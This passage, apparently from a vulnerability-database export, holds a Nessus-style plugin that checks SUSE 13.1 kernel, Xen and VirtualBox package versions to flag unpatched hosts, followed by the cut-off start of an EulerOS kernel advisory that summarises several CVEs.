flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-pae-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-pae-debuginfo-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-xen-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-xen-debuginfo-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-1.4.20.3-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-debuginfo-1.4.20.3-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-debugsource-1.4.20.3-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-default-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-default-debuginfo-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-desktop-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-desktop-debuginfo-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-pae-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-pae-debuginfo-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-xen-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-xen-debuginfo-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-vanilla-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-syms-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libipset3-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libipset3-debuginfo-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-1.58-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-debuginfo-1.58-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-debugsource-1.58-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-default-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-default-debuginfo-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-desktop-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-desktop-debuginfo-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-pae-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-pae-debuginfo-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-0.44-258.16.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-debuginfo-0.44-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-debugsource-0.44-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-default-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-default-debuginfo-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-desktop-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-desktop-debuginfo-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-pae-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-pae-debuginfo-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-virtualbox-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-virtualbox-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-debugsource-20130607-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-default-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-default-debuginfo-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-desktop-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-desktop-debuginfo-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-pae-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-pae-debuginfo-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-xen-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"vhba-kmp-xen-debuginfo-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-debugsource-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-devel-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-default-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-default-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-desktop-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-desktop-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-pae-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-pae-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-tools-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-tools-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-x11-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-x11-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-default-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-default-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-desktop-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-desktop-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-pae-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-pae-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-qt-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-qt-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-websrv-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-websrv-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-debugsource-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-devel-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-default-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-default-debuginfo-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-desktop-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-desktop-debuginfo-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-pae-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-pae-debuginfo-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-libs-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-libs-debuginfo-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-tools-domU-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-tools-domU-debuginfo-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"xtables-addons-2.3-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-debuginfo-2.3-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-debugsource-2.3-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-default-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-default-debuginfo-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-desktop-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-desktop-debuginfo-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-pae-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-pae-debuginfo-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-xen-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-xen-debuginfo-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.11.10-25.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", 
reference:\"kernel-xen-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.11.10-25.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", 
reference:\"kernel-trace-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-4.3.2_02-30.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-tools-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-xend-tools-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-xend-tools-debuginfo-4.3.2_02-30.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cloop / cloop-debuginfo / cloop-debugsource / cloop-kmp-default / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T09:01:30", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. 
The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):** DISPUTED ** Multiple\n integer overflows in the lzo1x_decompress_safe function\n in lib/lzo/lzo1x_decompress_safe.c in the LZO\n decompressor in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)A\n certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allow local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332)An elevation of\n privilege vulnerability in the kernel scsi driver.\n Product: Android. Versions: Android kernel. Android ID\n A-65023233.(CVE-2017-13168)An issue was discovered in\n drivers/i2c/i2c-core-smbus.c in the Linux kernel before\n 4.14.15. There is an out of bounds write in the\n function i2c_smbus_xfer_emulated.(CVE-2017-18551)An\n issue was discovered in net/ipv6/ip6mr.c in the Linux\n kernel before 4.11. By setting a specific socket\n option, an attacker can control a pointer in kernel\n land and cause an inet_csk_listen_stop general\n protection fault, or potentially execute arbitrary code\n under certain circumstances. The issue can be triggered\n 